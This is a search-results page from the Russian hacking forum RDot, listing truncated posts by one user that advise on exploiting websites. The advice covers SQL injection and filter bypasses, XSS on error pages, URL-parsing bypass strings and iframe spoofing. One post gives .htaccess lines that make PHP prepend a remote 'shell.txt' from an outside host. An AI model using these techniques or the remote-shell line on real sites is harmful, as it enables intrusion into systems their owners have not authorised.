Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 147.
На поиск затрачено 0.02 сек.
Поиск: Сообщения от: NameSpace
Раздел: Web-среда/Web-applications 16.03.2016, 14:09
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
Какая версия сервера? Какая OS? ...

Какая версия сервера? Какая OS?

https://rdot.org/forum/showthread.php?t=2949
Раздел: Web-среда/Web-applications 14.03.2016, 14:35
Ответов: 38
Просмотров: 113,328
Автор NameSpace
Если очень хочется concat, а запятой нет -...

Если очень хочется concat, а запятой нет - поможет group_concat:

mysql> SELECT group_concat(c) FROM (SELECT (1234)c UNION SELECT 5678)t;
+-----------------+
| group_concat(c) |...
Раздел: Web-среда/Web-applications 09.03.2016, 22:04
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
Препятствий эксплуатации уязвимости в вашем...

Препятствий эксплуатации уязвимости в вашем случае нет, но запрос вы строите некорректно. Error-based - метод вывода информации, не более того.

Для заливки легче достроить основной SELECT запрос,...
Раздел: Web-среда/Web-applications 09.03.2016, 00:08
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
Вы сами себе противоречите - говорите, что слеши...

Вы сами себе противоречите - говорите, что слеши использовать нельзя, а в векторе чтения их приводите.

Проблемы эксплуатации SQL-инъекций в REQUEST_URI вытекают не из-за невозможности...
Раздел: Web-среда/Web-applications 26.11.2015, 22:51
Ответов: 10
Просмотров: 19,945
Автор NameSpace
open_basedir = /home/nicklebed/data: Вероятно...

open_basedir = /home/nicklebed/data:
Вероятно это вам мешает. Попробуйте исполнять файлы в пределах данной директории.
Раздел: Web-среда/Web-applications 25.11.2015, 21:10
Ответов: 10
Просмотров: 19,945
Автор NameSpace
Попробуйте указать полный путь к /bin/ls. ...

Попробуйте указать полный путь к /bin/ls.

Если не поможет, приведите пожалуйста ваш phpinfo().
Раздел: Web-среда/Web-applications 25.11.2015, 03:06
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
Используйте векторы вытягивания данных колонок в...

Используйте векторы вытягивания данных колонок в 1-у строку.

В настоящее время список актуальных векторов можно посмотреть здесь: https://rdot.org/forum/showthread.php?t=2860
Раздел: Web-среда/Web-applications 14.11.2015, 11:26
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
Непосредственно можно использовать это как XSS в...

Непосредственно можно использовать это как XSS в IE. В SWF выполнить Javascript через ExternalInterface не получится, но можно полноценно обмениваться запросами с сервером. Хотя сегодня Flash...
Раздел: Web-среда/Web-applications 01.11.2015, 14:45
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
http://test.ru.qwerty.ru/ ...

http://test.ru.qwerty.ru/
http://test.ru.qwerty.ru:81//test.ru/
http://test.ru.qwerty.ru/%0A/
http://test.ru._qwerty.ru/
http://qwerty.ru/test.ru/
http://qwerty.ru/http://test.ru/...
Раздел: Web-среда/Web-applications 21.10.2015, 22:34
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
Увы, без начального слэша нельзя. Как понимаю,...

Увы, без начального слэша нельзя. Как понимаю, XSS-ка на странице ошибки? Попробуйте вызвать её другими методами: 404 (страница не существует), 403 (доступ запрещен), 414 (длинный URL), 413 (большой...
Раздел: Web-среда/Web-applications 21.10.2015, 04:11
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
Если same-origin policy стоит стандартная, то вам...

Если same-origin policy стоит стандартная, то вам не получится отправить на другой домен ничего, кроме GET, POST и OPTIONS запросов.
Раздел: Web-среда/Web-applications 01.10.2015, 11:13
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
Сорри, почему-то не заметил код. Как вариант -...

Сорри, почему-то не заметил код. Как вариант - посмотреть работу JavaScript с элементами на странице. Возможно имеются массовые обращения к ним по id или class.

К сожалению работает только в...
Раздел: Web-среда/Web-applications 01.10.2015, 00:59
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
WAF - Web Application Firewall. В вашем случае...

WAF - Web Application Firewall. В вашем случае понятие WAF - совокупность фильтров.

Для превращения данной недостаточной фильтрации в XSS, необходимы события (если символы > и < не удастся...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 08.09.2015, 23:13
Ответов: 7
Просмотров: 10,307
Автор NameSpace
Серьезно?! Так команды можешь выполнять, в чем...

Серьезно?! Так команды можешь выполнять, в чем состоит проблема?
grep -rni mysql_real_escape_string / 2>/dev/null Если права конечно позволят.
Раздел: Web-среда/Web-applications 23.08.2015, 01:09
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
Да, вот так жестоко. В безопасности отсутствует...

Да, вот так жестоко. В безопасности отсутствует НЕТ. Есть невозможно в настоящее время, векторы отсутствуют, etc
Раздел: Web-среда/Web-applications 21.08.2015, 01:04
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
QUERY_STRING не проходит urldecode (и по...

QUERY_STRING не проходит urldecode (и по техническим особенностям никогда не сможет цельно его пройти), вы можете передать закодированный запрос. Фильтр на SQL-injection обойдется. С одинарной...
Раздел: Web-среда/Web-applications 16.08.2015, 14:29
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
Для таблиц сейчас вектора нет. Для колонок: ...

Для таблиц сейчас вектора нет. Для колонок:

Вариант 1: https://rdot.org/forum/showpost.php?p=18012&postcount=10
Вариант 2: https://rdot.org/forum/showthread.php?t=2869
Раздел: Мировые новости/World news 11.08.2015, 22:59
Ответов: 5
Просмотров: 13,145
Автор NameSpace
Уязвимость в просмоторщике PDF. Если на Android...

Уязвимость в просмоторщике PDF. Если на Android его нет - уязвимости нет.

pdfjs.disabled = TRUE

Можно просто его выключить. Если вы им не пользуетесь - это самый верный путь.
Раздел: Web-среда/Web-applications 06.08.2015, 22:42
Ответов: 5
Просмотров: 7,041
Автор NameSpace
Если вы изменяетеи.htaccess, можно...

Если вы изменяетеи.htaccess, можно сконцентрироваться на нем и забыть о загрузке файлов.



php_flag allow_url_include on
php_value auto_prepend_file "http://site.com/shell.txt"


Аналогично...
Раздел: Web-среда/Web-applications 31.07.2015, 22:11
Ответов: 5
Просмотров: 7,041
Автор NameSpace
Можно попробовать перезаписать .htaccess (если...

Можно попробовать перезаписать .htaccess (если защита в нем, а не в конфигах апача), в случае, если нет проверки и есть соответствующие права. copy и move_uplodd_file поддерживают эту возможность.
...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 15.06.2015, 14:49
Ответов: 5
Просмотров: 8,696
Автор NameSpace
Как вы выполнили $ iptables, если iptables в...

Как вы выполнили $ iptables, если iptables в /sbin? IP адрес сервера, к которому вы подключаетесь, и на котором находитесь, совпадают (см. пункт о проксировании)?
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 15.06.2015, 13:36
Ответов: 5
Просмотров: 8,696
Автор NameSpace
allow_url_fopen? DNS? display_errors? ...

allow_url_fopen? DNS?

display_errors?

Разбейте процесс на части. Сначала получите IP по HOST. Попробуйте подключиться к нему через консоль. Уже затем PHP. Где-то цепь оборвется. Возможно...
Раздел: Web-среда/Web-applications 14.06.2015, 07:31
Ответов: 3,616
Просмотров: 1,974,208
Автор NameSpace
Как вам удается эксплуатировать её, используя...

Как вам удается эксплуатировать её, используя техники Blind SQL-inj? Каким образом результат запроса отражается на ресурсе? Обычно сканеры - самая верная вещь для её определения, и вероятно, её...
Раздел: Web-среда/Web-applications 10.06.2015, 14:22
Ответов: 3
Просмотров: 6,137
Автор NameSpace
Нельзя. Можно только попробовать подменить...

Нельзя. Можно только попробовать подменить ифрейм, т.е. клонировать открываемый ресурс с сохранением стилистики.
Раздел: Web-среда/Web-applications 10.06.2015, 13:11
Ответов: 3
Просмотров: 6,137
Автор NameSpace
Какие уязвимости вы имеете?

Какие уязвимости вы имеете?
Показано с 1 по 25 из 147.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot